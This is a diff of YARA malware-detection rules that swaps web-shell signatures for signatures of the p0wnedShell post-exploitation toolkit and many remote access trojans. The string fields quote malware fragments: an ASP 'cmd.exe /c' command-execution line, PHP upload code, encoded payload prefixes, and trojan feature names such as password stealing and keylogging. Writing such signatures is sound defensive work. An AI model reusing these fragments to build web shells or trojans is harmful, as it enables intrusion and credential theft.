-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L7332-L7345"
+		id = "0c62dd3a-195c-5890-b262-2eb00c58f8c1"
+		date = "2017-01-14"
+		modified = "2023-12-05"
+		reference = "https://github.com/Cn33liz/p0wnedShell"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_p0wnshell.yar#L142-L161"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "168cab58cee59dc4706b3be988312580"
-		logic_hash = "bee4d4c957ede41c771d690d52ac2fd3655238cc1fc106d30fb2721084b38aa1"
+		logic_hash = "4df7fcf508a9257ea418bd1995158c3676037b310dc884d44658977fda81b13b"
 		score = 75
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "fd7014625b58d00c6e54ad0e587c6dba5d50f8ca4b0f162d5af3357c2183c7a7"
 
 	strings:
-		$s1 = "PrSessKERNELU"
-		$s2 = "Cur3ntV7sion"
-		$s3 = "Explorer8"
+		$x1 = "Oq02AB+LCAAAAAAABADs/QkW3LiOLQBuRUsQR1H731gHMQOkFGFnvvrdp/O4sp6tkDiAIIjhAryu4z6PVOtxHuXz3/xT6X9za/Df/Hsa/JT/9" ascii
+		$x2 = "wpoWAB+LCAAAAAAABADs/QeyK7uOBYhORUNIenL+E2vBA0ympH3erY4f8Tte3TpbUiY9YRbcGK91vVKtr+tV3v/B/yr/m1vD/+DvNOVb+V/f" ascii
+		$x3 = "mo0MAB+LCAAAAAAABADsXQl24zqu3YqXII6i9r+xJ4AACU4SZcuJnVenf/9OxbHEAcRwcQGu62NbHsrax/Iw+3/hP5b+VzuH/4WfVeDf8n98" ascii
+		$x4 = "LE4CAB+LCAAAAAAABADsfQmW2zqu6Fa8BM7D/jf2hRmkKNuVm/Tt9zunkipb4giCIGb2/prhFUt5hVe+/sNP4b+pVvwPn+OQp/LT9ge/+" ascii
+		$x5 = "XpMCAB+LCAAAAAAABADsfQeWIzmO6FV0hKAn73+xL3iAwVAqq2t35r/tl53VyhCDFoQ3Y7zW9Uq1vq5Xef/CT+X/59bwFz6nKU/lp+8P/" ascii
+		$x6 = "STwAAB+LCAAAAAAABADtWwmy6yoO3YqXgJjZ/8ZaRwNgx/HNfX/o7qqUkxgzCM0SmLR2jHBQzkc4En9xZbvHUuSLMnWv9ateK/70ilStR" ascii
+		$x7 = "namespace p0wnedShell" fullword ascii
 
 	condition:
-		all of them
+		1 of them
 }
-rule SIGNATURE_BASE_Imhapftp
+rule SIGNATURE_BASE_P0Wnedamsibypass
 {
 	meta:
-		description = "Webshells Auto-generated - file iMHaPFtp.php"
+		description = "p0wnedShell Runspace Post Exploitation Toolkit - file p0wnedAmsiBypass.cs"
 		author = "Florian Roth (Nextron Systems)"
-		id = "c810c630-ce08-5059-ad49-f65b244f4d19"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L7346-L7357"
+		id = "168af265-d3e9-59a2-b754-20d6c9a298b1"
+		date = "2017-01-14"
+		modified = "2023-12-05"
+		reference = "https://github.com/Cn33liz/p0wnedShell"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_p0wnshell.yar#L163-L178"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "12911b73bc6a5d313b494102abcf5c57"
-		logic_hash = "c24bb80a0ae4284b4303450e9103c5dda30c41b41f323641ac1175461f741ced"
+		logic_hash = "1f7613506058706fc74979fdd4f9e425e9d16527120e0f2f49bc21e3e43d3b16"
 		score = 75
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "345e8e6f38b2914f4533c4c16421d372d61564a4275537e674a2ac3360b19284"
 
 	strings:
-		$s1 = "echo \"\\t<th class=\\\"permission_header\\\"><a href=\\\"$self?{$d}sort=permission$r\\\">"
+		$x1 = "Program.P0wnedPath()" fullword ascii
+		$x2 = "namespace p0wnedShell" fullword ascii
+		$x3 = "H4sIAAAAAAAEAO1YfXRUx3WflXalFazQgiVb5nMVryzxIbGrt/rcFRZIa1CQYEFCQnxotUhP2pX3Q337HpYotCKrPdbmoQQnkOY0+BQCNKRpe" ascii
 
 	condition:
-		all of them
+		1 of them
 }
-rule SIGNATURE_BASE_Unpack_Tback
+rule SIGNATURE_BASE_P0Wnedshell_Outputs
 {
 	meta:
-		description = "Webshells Auto-generated - file TBack.dll"
+		description = "p0wnedShell Runspace Post Exploitation Toolkit - from files p0wnedShell.cs, p0wnedShell.cs"
 		author = "Florian Roth (Nextron Systems)"
-		id = "b5f93621-e1e9-5aed-b574-471b4c1f9570"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L7358-L7369"
+		id = "c19fc14b-0c42-5dd1-bff2-ba75f4168d9c"
+		date = "2017-01-14"
+		modified = "2023-12-05"
+		reference = "https://github.com/Cn33liz/p0wnedShell"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_p0wnshell.yar#L180-L196"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "a9d1007823bf96fb163ab38726b48464"
-		logic_hash = "0fb43766c305f4235cc0987f411fdc3b3674723687f0b63d346429f4a7b5b87f"
+		logic_hash = "85d5317a473d981fe6ee1362789f34653a838c63d823bb62028a25c9db27cf6e"
 		score = 75
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash1 = "e1f35310192416cd79e60dba0521fc6eb107f3e65741c344832c46e9b4085e60"
 
 	strings:
-		$s5 = "\\final\\new\\lcc\\public.dll"
+		$s1 = "[+] For this attack to succeed, you need to have Admin privileges." fullword ascii
+		$s2 = "[+] This is not a valid hostname, please try again" fullword ascii
+		$s3 = "[+] First return the name of our current domain." fullword ascii
 
 	condition:
-		all of them
+		1 of them
 }
-rule SIGNATURE_BASE_Darkspy105
+rule SIGNATURE_BASE_RAT_AAR
 {
 	meta:
-		description = "Webshells Auto-generated - file DarkSpy105.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "9d519ccf-fe52-5b82-a39d-c9f86c1089e1"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L7370-L7381"
+		description = "Detects AAR RAT"
+		author = "Kevin Breen <kevin@techanarchy.net>"
+		id = "42c1af80-cff3-505f-a3cb-35b7e34575e1"
+		date = "2014-01-04"
+		modified = "2023-12-05"
+		reference = "http://malwareconfig.com/stats/AAR"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_rats_malwareconfig.yar#L1-L22"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "f0b85e7bec90dba829a3ede1ab7d8722"
-		logic_hash = "0f1c9dba4525f9c30f309500652ed6af647ddf492f483e101fc23c891e15fc85"
+		logic_hash = "a206b3f5cf6cc870135bc267b5baab8333422dc917efce6c66ee907690592d09"
 		score = 75
 		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		maltype = "Remote Access Trojan"
+		filetype = "exe"
 
 	strings:
-		$s7 = "Sorry,DarkSpy got an unknown exception,please re-run it,thanks!"
+		$a = "Hashtable"
+		$b = "get_IsDisposed"
+		$c = "TripleDES"
+		$d = "testmemory.FRMMain.resources"
+		$e = "$this.Icon" wide
+		$f = "{11111-22222-20001-00001}" wide
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_Editserver_EXE
+rule SIGNATURE_BASE_RAT_Adzok
 {
 	meta:
-		description = "Webshells Auto-generated - file EditServer.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "97928144-0112-5288-8f95-acf7a0d56e71"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L7382-L7395"
+		description = "Detects Adzok RAT"
+		author = "Kevin Breen <kevin@techanarchy.net>"
+		id = "93807f85-ae4e-5fd2-9010-ed2cf6f57f38"
+		date = "2015-01-05"
+		modified = "2023-12-05"
+		reference = "http://malwareconfig.com/stats/Adzok"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_rats_malwareconfig.yar#L24-L48"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "f945de25e0eba3bdaf1455b3a62b9832"
-		logic_hash = "d440669b0c0bf575cf9dea946edf55f724300a4c765e90c631fc1eee062bf006"
+		logic_hash = "ee3291a4396ba6cb3c5e22229de4f5e45714b29bfeac1c56bde6d038a9d25458"
 		score = 75
 		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		Versions = "Free 1.0.0.3,"
+		maltype = "Remote Access Trojan"
+		filetype = "jar"
 
 	strings:
-		$s2 = "Server %s Have Been Configured"
-		$s5 = "The Server Password Exceeds 32 Characters"
-		$s8 = "9--Set Procecess Name To Inject DLL"
+		$a1 = "config.xmlPK"
+		$a2 = "key.classPK"
+		$a3 = "svd$1.classPK"
+		$a4 = "svd$2.classPK"
+		$a5 = "Mensaje.classPK"
+		$a6 = "inic$ShutdownHook.class"
+		$a7 = "Uninstall.jarPK"
+		$a8 = "resources/icono.pngPK"
 
 	condition:
-		all of them
+		7 of ( $a* )
 }
-rule SIGNATURE_BASE_FSO_S_Reader
+rule SIGNATURE_BASE_RAT_Ap0Calypse
 {
 	meta:
-		description = "Webshells Auto-generated - file reader.asp"
-		author = "Florian Roth (Nextron Systems)"
-		id = "d596f7f4-5b0d-5f17-94d3-2582ec041eb1"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L7396-L7407"
+		description = "Detects Ap0calypse RAT"
+		author = "Kevin Breen <kevin@techanarchy.net>"
+		id = "a2993654-efa0-519b-b6f6-4d722d93adde"
+		date = "2014-01-04"
+		modified = "2023-12-05"
+		reference = "http://malwareconfig.com/stats/Ap0calypse"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_rats_malwareconfig.yar#L50-L71"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "b598c8b662f2a1f6cc61f291fb0a6fa2"
-		logic_hash = "89a948f8da66173965884cd525615c8eeb91cf98a4984c05be7472034bb72f76"
+		logic_hash = "1ce90a5b1b3f643d4e530d6e00741f5d5918d3199cfbc4126cf8421a9e42023e"
 		score = 75
 		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		maltype = "Remote Access Trojan"
+		filetype = "exe"
 
 	strings:
-		$s2 = "mailto:mailbomb@hotmail."
+		$a = "Ap0calypse"
+		$b = "Sifre"
+		$c = "MsgGoster"
+		$d = "Baslik"
+		$e = "Dosyalars"
+		$f = "Injecsiyon"
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_ASP_Cmdasp
+rule SIGNATURE_BASE_RAT_Arcom
 {
 	meta:
-		description = "Webshells Auto-generated - file CmdAsp.asp"
-		author = "Florian Roth (Nextron Systems)"
-		id = "e4b48843-1936-5717-b2b6-add5b4a14d04"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L7408-L7421"
+		description = "Detects Arcom RAT"
+		author = "Kevin Breen <kevin@techanarchy.net>"
+		id = "a0598340-c4a5-53f0-a810-63e37ec669a5"
+		date = "2014-01-04"
+		modified = "2023-12-05"
+		reference = "http://malwareconfig.com/stats/Arcom"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_rats_malwareconfig.yar#L72-L93"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "79d4f3425f7a89befb0ef3bafe5e332f"
-		logic_hash = "84c3148fe74b1afaa6e3bbff0aca8df1f1775759a36a673cc13d35ef7658929c"
+		logic_hash = "dbccd9885ba0ec5741e3c74908d2e76b15836bc75373c100f344abf9bdf3a0b4"
 		score = 75
 		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		maltype = "Remote Access Trojan"
+		filetype = "exe"
 
 	strings:
-		$s2 = "' -- Read the output from our command and remove the temp file -- '"
-		$s6 = "Call oScript.Run (\"cmd.exe /c \" & szCMD & \" > \" & szTempFile, 0, True)"
-		$s9 = "' -- create the COM objects that we will be using -- '"
+		$a1 = "CVu3388fnek3W(3ij3fkp0930di"
+		$a2 = "ZINGAWI2"
+		$a3 = "clWebLightGoldenrodYellow"
+		$a4 = "Ancestor for '%s' not found" wide
+		$a5 = "Control-C hit" wide
+		$a6 = {A3 24 25 21}
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_KA_Ushell
+rule SIGNATURE_BASE_RAT_Bandook
 {
 	meta:
-		description = "Webshells Auto-generated - file KA_uShell.php"
-		author = "Florian Roth (Nextron Systems)"
-		id = "34e220db-2fb5-59dc-b5e8-d88f844d3977"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L7422-L7434"
+		description = "Detects Bandook RAT"
+		author = "Kevin Breen <kevin@techanarchy.net>"
+		id = "79fb99d8-bd56-5986-9917-e119b51b8303"
+		date = "2014-01-04"
+		modified = "2023-12-05"
+		reference = "http://malwareconfig.com/stats/bandook"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_rats_malwareconfig.yar#L95-L120"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "685f5d4f7f6751eaefc2695071569aab"
-		logic_hash = "58d25e19e2e14a909b4b623a85dfd8c62974121d3b23574d1e94b62385e42b45"
+		logic_hash = "fe658e0990f0d456b1a8f5acea62a3b80bdd4a9bc0eedfe2e1092ea60b4fca2e"
 		score = 75
 		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		maltype = "Remote Access Trojan"
+		filetype = "exe"
 
 	strings:
-		$s5 = "if(empty($_SERVER['PHP_AUTH_PW']) || $_SERVER['PHP_AUTH_PW']<>$pass"
-		$s6 = "if ($_POST['path']==\"\"){$uploadfile = $_FILES['file']['name'];}"
+		$a = "aaaaaa1|"
+		$b = "aaaaaa2|"
+		$c = "aaaaaa3|"
+		$d = "aaaaaa4|"
+		$e = "aaaaaa5|"
+		$f = "%s%d.exe"
+		$g = "astalavista"
+		$h = "givemecache"
+		$i = "%s\\system32\\drivers\\blogs\\*"
+		$j = "bndk13me"
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_PHP_Backdoor_V1
+rule SIGNATURE_BASE_RAT_Blacknix
 {
 	meta:
-		description = "Webshells Auto-generated - file PHP Backdoor v1.php"
-		author = "Florian Roth (Nextron Systems)"
-		id = "f47298a9-a47c-5088-ab1f-1bd76bfd0ca8"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L7435-L7448"
+		description = "Detects BlackNix RAT"
+		author = "Kevin Breen <kevin@techanarchy.net>"
+		id = "d7814184-3ae4-53f1-a602-c3fbc02573c3"
+		date = "2014-01-04"
+		modified = "2023-12-05"
+		reference = "http://malwareconfig.com/stats/BlackNix"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_rats_malwareconfig.yar#L122-L142"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "0506ba90759d11d78befd21cabf41f3d"
-		logic_hash = "396ae1ee34a06ab4863f4f54257a9020b8747fb99dff15372f0aa54fa4598e43"
+		logic_hash = "de8787fd35e6313c061b8759361698b1acd54b215d226839a8702b1a5d189ccb"
 		score = 75
 		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		maltype = "Remote Access Trojan"
+		filetype = "exe"
 
 	strings:
-		$s5 = "echo\"<form method=\\\"POST\\\" action=\\\"\".$_SERVER['PHP_SELF'].\"?edit=\".$th"
-		$s8 = "echo \"<a href=\\\"\".$_SERVER['PHP_SELF'].\"?proxy"
+		$a1 = "SETTINGS" wide
+		$a2 = "Mark Adler"
+		$a3 = "Random-Number-Here"
+		$a4 = "RemoteShell"
+		$a5 = "SystemInfo"
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_Svchostdll
+rule SIGNATURE_BASE_RAT_Blackshades : BLACKSHADES
 {
 	meta:
-		description = "Webshells Auto-generated - file svchostdll.dll"
-		author = "Florian Roth (Nextron Systems)"
-		id = "b369d702-1f29-56ec-a742-f87d9c42c775"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L7449-L7468"
+		description = "Detects BlackShades RAT"
+		author = "Brian Wallace (@botnet_hunter)"
+		id = "039f9efd-034d-5088-9a2f-7a63ad170d3d"
+		date = "2014-01-04"
+		modified = "2023-12-05"
+		reference = "http://blog.cylance.com/a-study-in-bots-blackshades-net"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_rats_malwareconfig.yar#L144-L161"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "0f6756c8cb0b454c452055f189e4c3f4"
-		logic_hash = "4a7a7bb7d827c2e7801f8c33b292bb3d312428fc4ae79f07e103f456984c3b83"
+		logic_hash = "23f8d52cf92b594f9302d549cf54f37dc0a01b5686da74b72120a8072435abfe"
 		score = 75
 		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "BLACKSHADES"
+		family = "blackshades"
 
 	strings:
-		$s0 = "InstallService"
-		$s1 = "RundllInstallA"
-		$s2 = "UninstallService"
-		$s3 = "&G3 Users In RegistryD"
-		$s4 = "OL_SHUTDOWN;I"
-		$s5 = "SvcHostDLL.dll"
-		$s6 = "RundllUninstallA"
-		$s7 = "InternetOpenA"
-		$s8 = "Check Cloneomplete"
+		$string1 = "bss_server"
+		$string2 = "txtChat"
+		$string3 = "UDPFlood"
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_Hytop_Devpack_Server
+rule SIGNATURE_BASE_RAT_Bluebanana
 {
 	meta:
-		description = "Webshells Auto-generated - file server.asp"
-		author = "Florian Roth (Nextron Systems)"
-		id = "0e4fee1b-8a16-5738-9600-fa965f8c84c2"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L7469-L7480"
+		description = "Detects BlueBanana RAT"
+		author = "Kevin Breen <kevin@techanarchy.net>"
+		id = "f00c7e92-f34c-5666-a1d9-02ac2cf7608c"
+		date = "2014-01-04"
+		modified = "2023-12-05"
+		reference = "http://malwareconfig.com/stats/BlueBanana"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_rats_malwareconfig.yar#L163-L184"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "1d38526a215df13c7373da4635541b43"
-		logic_hash = "66b8513a532f64af535c948da28674795ae6495b9844165c3b039bf61c25eb46"
+		logic_hash = "0d84bb63d56d876c8b2e7c8c8afeaba839fee41d2d38f16ac9a13e802008179e"
 		score = 75
 		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		maltype = "Remote Access Trojan"
+		filetype = "Java"
 
 	strings:
-		$s0 = "<!-- PageServer Below -->"
+		$meta = "META-INF"
+		$conf = "config.txt"
+		$a = "a/a/a/a/f.class"
+		$b = "a/a/a/a/l.class"
+		$c = "a/a/a/b/q.class"
+		$d = "a/a/a/b/v.class"
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_Vanquish
+rule SIGNATURE_BASE_RAT_Bozok
 {
 	meta:
-		description = "Webshells Auto-generated - file vanquish.dll"
-		author = "Florian Roth (Nextron Systems)"
-		id = "143e5e46-ffbc-5aee-9f9b-13374a6c3c10"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L7481-L7494"
+		description = "Detects Bozok RAT"
+		author = "Kevin Breen <kevin@techanarchy.net>"
+		id = "b1d22e8c-39aa-52e7-9ca8-2b35bb82f7de"
+		date = "2014-01-04"
+		modified = "2023-12-05"
+		reference = "http://malwareconfig.com/stats/Bozok"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_rats_malwareconfig.yar#L186-L206"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "684450adde37a93e8bb362994efc898c"
-		logic_hash = "223c59d06a9389f380fa29959c54e53a17b53080f704189ae519b9527b2c6384"
+		logic_hash = "9a2fcd11573654f0c91c0c0dec8938ca8319a23953a5043135cb0032562f9f53"
 		score = 75
-		quality = 85
+		quality = 75
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		maltype = "Remote Access Trojan"
+		filetype = "exe"
 
 	strings:
-		$s3 = "You cannot delete protected files/folders! Instead, your attempt has been logged"
-		$s8 = "?VCreateProcessA@@YGHPBDPADPAU_SECURITY_ATTRIBUTES@@2HKPAX0PAU_STARTUPINFOA@@PAU"
-		$s9 = "?VFindFirstFileExW@@YGPAXPBGW4_FINDEX_INFO_LEVELS@@PAXW4_FINDEX_SEARCH_OPS@@2K@Z"
+		$a = "getVer" nocase
+		$b = "StartVNC" nocase
+		$c = "SendCamList" nocase
+		$d = "untPlugin" nocase
+		$e = "gethostbyname" nocase
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_Winshell
+rule SIGNATURE_BASE_RAT_Clientmesh : TORCT
 {
 	meta:
-		description = "Webshells Auto-generated - file winshell.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "24edd03a-df71-5d84-9764-ba7903b68064"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L7495-L7514"
+		description = "Detects ClientMesh RAT"
+		author = "Kevin Breen <kevin@techanarchy.net> (slightly modified by Florian Roth to improve performance)"
+		id = "351df33e-d3a1-5fe8-be38-edb43bc5d38f"
+		date = "2014-01-06"
+		modified = "2023-12-05"
+		reference = "http://malwareconfig.com/stats/ClientMesh"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_rats_malwareconfig.yar#L208-L228"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "3144410a37dd4c29d004a814a294ea26"
-		logic_hash = "addbfa598039af09c0e4c50138fcfabd16c35c5516259cf9595cf49855da518d"
+		logic_hash = "671da9586110726b1646d4365ccaa87982ec7c86b7d4d80b99dbb444496b936c"
 		score = 75
 		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "TORCT"
+		family = "torct"
 
 	strings:
-		$s0 = "Software\\Microsoft\\Windows\\CurrentVersion\\RunServices"
-		$s1 = "WinShell Service"
-		$s2 = "__GLOBAL_HEAP_SELECTED"
-		$s3 = "__MSVCRT_HEAP_SELECT"
-		$s4 = "Provide Windows CmdShell Service"
-		$s5 = "URLDownloadToFileA"
-		$s6 = "RegisterServiceProcess"
-		$s7 = "GetModuleBaseNameA"
-		$s8 = "WinShell v5.0 (C)2002 janker.org"
+		$string1 = "machinedetails"
+		$string2 = "MySettings"
+		$string3 = "sendftppasswords"
+		$string4 = "sendbrowserpasswords"
+		$string5 = "arma2keyMass"
+		$string6 = "keylogger"
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_FSO_S_Remview
+rule SIGNATURE_BASE_RAT_Cybergate
 {
 	meta:
-		description = "Webshells Auto-generated - file remview.php"
-		author = "Florian Roth (Nextron Systems)"
-		id = "5040ddbc-2e61-50ca-b738-a4ac8feec3f1"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L7515-L7528"
+		description = "Detects CyberGate RAT"
+		author = "Kevin Breen <kevin@techanarchy.net>"
+		id = "387e7c89-c766-54cf-aac0-3ba03092bc25"
+		date = "2014-01-04"
+		modified = "2023-12-05"
+		reference = "http://malwareconfig.com/stats/CyberGate"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_rats_malwareconfig.yar#L230-L254"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "b4a09911a5b23e00b55abe546ded691c"
-		logic_hash = "19719e8c9215ec9ba9fab55b604907e0a6d0a0507a5662926acff1e9dc03440e"
+		logic_hash = "6b3861ae5e6bd6478e9d8024b0e67a3ac1dbf31083b77477364c55b51d0ed9b5"
 		score = 75
 		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		maltype = "Remote Access Trojan"
+		filetype = "exe"
 
 	strings:
-		$s2 = "      echo \"<hr size=1 noshade>\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\""
-		$s3 = "         echo \"<script>str$i=\\\"\".str_replace(\"\\\"\",\"\\\\\\\"\",str_replace(\"\\\\\",\"\\\\\\\\\""
-		$s4 = "      echo \"<hr size=1 noshade>\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n<"
+		$string1 = {23 23 23 23 40 23 23 23 23 E8 EE E9 F9 23 23 23 23 40 23 23 23 23}
+		$string2 = {23 23 23 23 40 23 23 23 23 FA FD F0 EF F9 23 23 23 23 40 23 23 23 23}
+		$string3 = "EditSvr"
+		$string4 = "TLoader"
+		$string5 = "Stroks"
+		$string6 = "####@####"
+		$res1 = "XX-XX-XX-XX"
+		$res2 = "CG-CG-CG-CG"
 
 	condition:
-		all of them
+		all of ( $string* ) and any of ( $res* )
 }
-rule SIGNATURE_BASE_Saphpshell
+rule SIGNATURE_BASE_RAT_Darkcomet
 {
 	meta:
-		description = "Webshells Auto-generated - file saphpshell.php"
-		author = "Florian Roth (Nextron Systems)"
-		id = "42bcd739-714e-5dbf-a3a1-929f3d16ed6f"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L7529-L7540"
